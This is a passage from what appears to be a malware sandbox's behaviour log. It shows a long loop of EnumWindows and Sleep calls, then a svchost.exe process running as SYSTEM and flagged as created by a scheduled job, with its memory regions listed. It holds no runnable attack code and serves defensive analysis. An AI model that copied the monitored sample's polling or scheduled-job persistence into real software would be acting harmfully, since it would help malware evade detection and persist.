lParam=0x2360000) [0287.131] Sleep (dwMilliseconds=0x64) [0287.227] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.227] Sleep (dwMilliseconds=0x64) [0287.268] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.270] Sleep (dwMilliseconds=0x64) [0287.308] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.309] Sleep (dwMilliseconds=0x64) [0287.413] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.414] Sleep (dwMilliseconds=0x64) [0287.457] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.458] Sleep (dwMilliseconds=0x64) [0287.478] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.479] Sleep (dwMilliseconds=0x64) [0287.532] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.533] Sleep (dwMilliseconds=0x64) [0287.554] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.555] Sleep (dwMilliseconds=0x64) [0287.561] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.561] Sleep (dwMilliseconds=0x64) [0287.615] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.616] Sleep (dwMilliseconds=0x64) [0287.671] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.672] Sleep (dwMilliseconds=0x64) [0287.697] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.699] Sleep (dwMilliseconds=0x64) [0287.751] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.752] Sleep (dwMilliseconds=0x64) [0287.819] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.821] Sleep (dwMilliseconds=0x64) [0287.890] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.891] Sleep (dwMilliseconds=0x64) [0287.976] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.980] Sleep (dwMilliseconds=0x64) [0288.109] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.110] Sleep (dwMilliseconds=0x64) [0288.122] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.123] Sleep (dwMilliseconds=0x64) [0288.175] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.176] Sleep (dwMilliseconds=0x64) [0288.229] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.230] Sleep (dwMilliseconds=0x64) [0288.273] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.276] Sleep (dwMilliseconds=0x64) [0288.354] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.355] Sleep (dwMilliseconds=0x64) [0288.451] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.451] Sleep (dwMilliseconds=0x64) [0288.528] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.529] Sleep (dwMilliseconds=0x64) [0288.565] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.566] Sleep (dwMilliseconds=0x64) [0288.600] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.602] Sleep (dwMilliseconds=0x64) [0288.624] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.625] Sleep (dwMilliseconds=0x64) [0288.700] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.702] Sleep (dwMilliseconds=0x64) [0288.771] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.772] Sleep (dwMilliseconds=0x64) [0288.815] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.817] Sleep (dwMilliseconds=0x64) [0288.879] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.879] Sleep (dwMilliseconds=0x64) [0288.942] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.943] Sleep (dwMilliseconds=0x64) [0288.988] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0288.988] Sleep (dwMilliseconds=0x64) [0289.047] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.049] Sleep (dwMilliseconds=0x64) [0289.095] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.097] Sleep (dwMilliseconds=0x64) [0289.166] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.168] Sleep (dwMilliseconds=0x64) [0289.314] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.315] Sleep (dwMilliseconds=0x64) [0289.388] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.390] Sleep (dwMilliseconds=0x64) [0289.482] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.482] Sleep (dwMilliseconds=0x64) [0289.578] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.580] Sleep (dwMilliseconds=0x64) [0289.641] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.642] Sleep (dwMilliseconds=0x64) [0289.715] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.720] Sleep (dwMilliseconds=0x64) [0289.814] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.815] Sleep (dwMilliseconds=0x64) [0289.863] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.864] Sleep (dwMilliseconds=0x64) [0289.890] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.891] Sleep (dwMilliseconds=0x64) [0289.934] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.939] Sleep (dwMilliseconds=0x64) [0289.955] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0289.955] Sleep (dwMilliseconds=0x64) [0290.022] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.024] Sleep (dwMilliseconds=0x64) [0290.122] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.126] Sleep (dwMilliseconds=0x64) [0290.204] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.205] Sleep (dwMilliseconds=0x64) [0290.262] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.264] Sleep (dwMilliseconds=0x64) [0290.353] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.353] Sleep (dwMilliseconds=0x64) [0290.365] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.366] Sleep (dwMilliseconds=0x64) [0290.372] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.373] Sleep (dwMilliseconds=0x64) [0290.451] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.453] Sleep (dwMilliseconds=0x64) [0290.488] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.488] Sleep (dwMilliseconds=0x64) [0290.528] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.529] Sleep (dwMilliseconds=0x64) [0290.623] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.624] Sleep (dwMilliseconds=0x64) [0290.684] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.685] Sleep (dwMilliseconds=0x64) [0290.748] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.749] Sleep (dwMilliseconds=0x64) [0290.809] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.813] Sleep (dwMilliseconds=0x64) [0290.828] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.828] Sleep (dwMilliseconds=0x64) [0290.842] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.843] Sleep (dwMilliseconds=0x64) [0290.873] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.874] Sleep (dwMilliseconds=0x64) [0290.918] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.920] Sleep (dwMilliseconds=0x64) [0290.970] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0290.970] Sleep (dwMilliseconds=0x64) [0291.014] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.016] Sleep (dwMilliseconds=0x64) [0291.108] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.108] Sleep (dwMilliseconds=0x64) [0291.184] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.186] Sleep (dwMilliseconds=0x64) [0291.211] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.212] Sleep (dwMilliseconds=0x64) [0291.249] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.250] Sleep (dwMilliseconds=0x64) [0291.275] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.276] Sleep (dwMilliseconds=0x64) [0291.277] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.278] Sleep (dwMilliseconds=0x64) [0291.295] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.296] Sleep (dwMilliseconds=0x64) [0291.359] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.361] Sleep (dwMilliseconds=0x64) [0291.410] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.411] Sleep (dwMilliseconds=0x64) [0291.452] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.454] Sleep (dwMilliseconds=0x64) [0291.545] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.546] Sleep (dwMilliseconds=0x64) [0291.622] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.623] Sleep (dwMilliseconds=0x64) [0291.640] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.641] Sleep (dwMilliseconds=0x64) [0291.692] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.694] Sleep (dwMilliseconds=0x64) [0291.713] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.713] Sleep (dwMilliseconds=0x64) [0291.715] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.716] Sleep (dwMilliseconds=0x64) [0291.751] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.752] Sleep (dwMilliseconds=0x64) [0291.843] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.845] Sleep (dwMilliseconds=0x64) [0291.892] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.893] Sleep (dwMilliseconds=0x64) [0291.981] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0291.986] Sleep (dwMilliseconds=0x64) [0292.080] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.081] Sleep (dwMilliseconds=0x64) [0292.135] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.153] Sleep (dwMilliseconds=0x64) [0292.209] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.210] Sleep (dwMilliseconds=0x64) [0292.229] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.231] Sleep (dwMilliseconds=0x64) [0292.326] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.327] Sleep (dwMilliseconds=0x64) [0292.466] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.468] Sleep (dwMilliseconds=0x64) [0292.561] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.561] Sleep (dwMilliseconds=0x64) [0292.656] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.657] Sleep (dwMilliseconds=0x64) [0292.669] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.670] Sleep (dwMilliseconds=0x64) [0292.715] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.717] Sleep (dwMilliseconds=0x64) [0292.740] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.741] Sleep (dwMilliseconds=0x64) [0292.746] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.747] Sleep (dwMilliseconds=0x64) [0292.827] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.828] Sleep (dwMilliseconds=0x64) [0292.923] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.925] Sleep (dwMilliseconds=0x64) [0292.969] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0292.969] Sleep (dwMilliseconds=0x64) [0293.012] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.014] Sleep (dwMilliseconds=0x64) [0293.108] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.108] Sleep (dwMilliseconds=0x64) [0293.145] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.147] Sleep (dwMilliseconds=0x64) [0293.170] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.171] Sleep (dwMilliseconds=0x64) [0293.216] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.217] Sleep (dwMilliseconds=0x64) [0293.280] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.281] Sleep (dwMilliseconds=0x64) [0293.370] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.371] Sleep (dwMilliseconds=0x64) [0293.453] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.454] Sleep (dwMilliseconds=0x64) [0293.530] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.531] Sleep (dwMilliseconds=0x64) [0293.569] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.570] Sleep (dwMilliseconds=0x64) [0293.622] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.624] Sleep (dwMilliseconds=0x64) [0293.643] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.643] Sleep (dwMilliseconds=0x64) [0293.653] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.655] Sleep (dwMilliseconds=0x64) [0293.736] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.737] Sleep (dwMilliseconds=0x64) [0293.809] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.811] Sleep (dwMilliseconds=0x64) [0293.905] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.906] Sleep (dwMilliseconds=0x64) [0293.955] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0293.956] Sleep (dwMilliseconds=0x64) [0294.049] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.049] Sleep (dwMilliseconds=0x64) [0294.171] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.172] Sleep (dwMilliseconds=0x64) [0294.235] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.236] Sleep (dwMilliseconds=0x64) [0294.268] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.270] Sleep (dwMilliseconds=0x64) [0294.317] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.317] Sleep (dwMilliseconds=0x64) [0294.331] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.331] Sleep (dwMilliseconds=0x64) [0294.407] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.407] Sleep (dwMilliseconds=0x64) [0294.437] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.439] Sleep (dwMilliseconds=0x64) [0294.520] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.521] Sleep (dwMilliseconds=0x64) [0294.530] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.531] Sleep (dwMilliseconds=0x64) [0294.548] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.549] Sleep (dwMilliseconds=0x64) [0294.593] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.595] Sleep (dwMilliseconds=0x64) [0294.637] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.638] Sleep (dwMilliseconds=0x64) [0294.703] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.705] Sleep (dwMilliseconds=0x64) [0294.780] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.782] Sleep (dwMilliseconds=0x64) [0294.825] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.826] Sleep (dwMilliseconds=0x64) [0294.890] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.892] Sleep (dwMilliseconds=0x64) [0294.986] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0294.987] Sleep (dwMilliseconds=0x64) [0295.048] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.050] Sleep (dwMilliseconds=0x64) [0295.111] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.111] Sleep (dwMilliseconds=0x64) [0295.267] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.268] Sleep (dwMilliseconds=0x64) [0295.327] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.328] Sleep (dwMilliseconds=0x64) [0295.421] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.422] Sleep (dwMilliseconds=0x64) [0295.470] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.471] Sleep (dwMilliseconds=0x64) [0295.512] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.517] Sleep (dwMilliseconds=0x64) [0295.657] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.658] Sleep (dwMilliseconds=0x64) [0295.731] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.732] Sleep (dwMilliseconds=0x64) [0295.796] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.797] Sleep (dwMilliseconds=0x64) [0295.887] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0295.889] Sleep (dwMilliseconds=0x64) Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75956000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1812 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1813 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1814 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1815 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1816 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1817 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1818 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1819 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1820 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1821 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1822 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1823 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1824 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1825 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1826 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1827 start_va = 0x420000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1828 start_va = 0x430000 end_va = 0x432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1829 start_va = 0x440000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1830 start_va = 0x450000 end_va = 0x454fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1831 start_va = 0x460000 end_va = 0x46ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1832 start_va = 0x470000 end_va = 0x479fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1833 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1834 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1835 start_va = 0x550000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1836 start_va = 0x5d0000 end_va = 0x5d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1837 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1838 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1839 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1840 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1841 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1842 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1843 start_va = 0x8b0000 end_va = 0x8bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1844 start_va = 0x8c0000 end_va = 0x8c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1845 start_va = 0x8e0000 end_va = 0x8e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1846 start_va = 0x8f0000 end_va = 0x8f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1847 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1848 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1849 start_va = 0xb90000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 1850 start_va = 0xc90000 end_va = 0xc93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1851 start_va = 0xca0000 end_va = 0xcb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1852 start_va = 0xcc0000 end_va = 0xcc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1853 start_va = 0xcd0000 end_va = 0xd14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 1854 start_va = 0xd20000 end_va = 0xd2cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 1855 start_va = 0xd30000 end_va = 0xd36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 1856 start_va = 0xd40000 end_va = 0xd41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 1857 start_va = 0xdc0000 end_va = 0xdc8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename 